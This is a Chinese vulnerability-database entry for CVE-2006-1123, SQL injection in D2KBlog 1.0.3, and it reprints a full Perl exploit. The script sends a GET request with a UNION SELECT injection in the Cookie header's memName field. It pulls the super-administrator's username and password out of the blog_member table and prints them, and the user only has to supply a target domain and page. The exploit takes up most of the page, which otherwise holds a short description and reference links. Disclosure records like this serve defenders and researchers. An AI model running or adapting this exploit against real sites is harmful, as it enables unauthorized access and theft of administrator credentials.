D2KBlog多个SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109893 漏洞类型 SQL注入
发布时间 2006-03-09 更新时间 2006-03-10
CVE编号 CVE-2006-1123 CNNVD-ID CNNVD-200603-139
漏洞平台 ASP CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/1569
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200603-139
|漏洞详情
D2KBlog1.0.3及其早期版本中存在SQL注入漏洞,远程攻击者可以通过memName参数来执行任意SQL指令。
|漏洞EXP
#!/usr/bin/perl -w 
 # D2KBLOG SQL injection 
 # Discovered by : Farhad Koosha [ farhadkey [at} kapda.ir ]
 # Exploited by : devil_box [ devil_box [at} kapda.ir ]
 # member of : Kapda.ir - Security Science Researchers Institute of Iran (persianhacker.net)

require LWP::UserAgent;
require HTTP::Request;
print "\r\n\r\n=-=-=-==================================================================-=-=-=\r\n\r\n";
print "	KAPDA - Security Science Researchers Institute of Iran\r\n\r\n";
print "	PoC for D2KBLOG SQL injection bug - Administrator Password Extractor\r\n\r\n";
print "	Original Source : http://kapda.ir/advisory-287.html (persianhacker.net)\r\n\r\n";
print "\r\n=-=-=-==================================================================-=-=-=\r\n";

 if (@ARGV != 2) 
 { 
    print "	Usage: kapda_D2KBLOG_xpl.pl [Target Domain] [Vulnerable Page]\n\r\n"; 
    print "	ex: kapda_D2KBLOG_xpl.pl www.target.com /blog/profile.asp\n\r\n";
    exit (); 
 } 


my $ua = LWP::UserAgent->new(env_proxy => 1,keep_alive => 1,timeout => 30,);

my $Path = $ARGV[0];

my $Page = $ARGV[1];

my $URL = "http://".$Path.$Page;

print "|***| Connecting to ".$URL." ...\r\n";

$r = HTTP::Request->new(GET => $URL."?action=edit");

$r->header( "Cookie" =>$Path."=memPassword=&memStatus=&memName=<!--'UNION%20ALL%20select%201,1,1,'**stxt**|UserName|:|'%2bmem_name%2b'|-=-|Password|:|'%2bmem_password%2b'|**etxt**',1,1,1,1,1,1,1,1,'Discovered%20and%20coded%20by%20farhadkey%20from%20KAPDA.ir'%20from%20blog_member%20where%20mem_status='SupAdmin'%20or%20'1'='-->" );

$res = $ua->request($r);

print "|***| Connected !\r\n";

if ($res->is_success) {

	print "|***| Extracting Username and Password ...\r\n\r\n";

	my $results = $res->content; 

	while($results=~/\"\*\*stxt\*\*(.*?)\*\*etxt\*\*\"/ig){ print "-=-> $1 \r\n"; }

	print "\r\n	Exploit by Devil_Box\r\n		Discovery by Farhad koosha\r\n\r\n";

 } else {
	die "\r\n|***| ".$res->status_line;
 }

# milw0rm.com [2006-03-09]
|参考资料

来源:BUGTRAQ
名称:20060308[KAPDA::#32]-d2kBlog1.0.3MultipleVulnerabilities
链接:http://www.securityfocus.com/archive/1/archive/1/427103/100/0/threaded
来源:VUPEN
名称:ADV-2006-0896
链接:http://www.frsirt.com/english/advisories/2006/0896
来源:SECUNIA
名称:19177
链接:http://secunia.com/advisories/19177
来源:XF
名称:d2kblog-memname-sql-injection(25215)
链接:http://xforce.iss.net/xforce/xfdb/25215
来源:BID
名称:17035
链接:http://www.securityfocus.com/bid/17035
来源:OSVDB
名称:23770
链接:http://www.osvdb.org/23770
来源:SREASON
名称:559
链接:http://securityreason.com/securityalert/559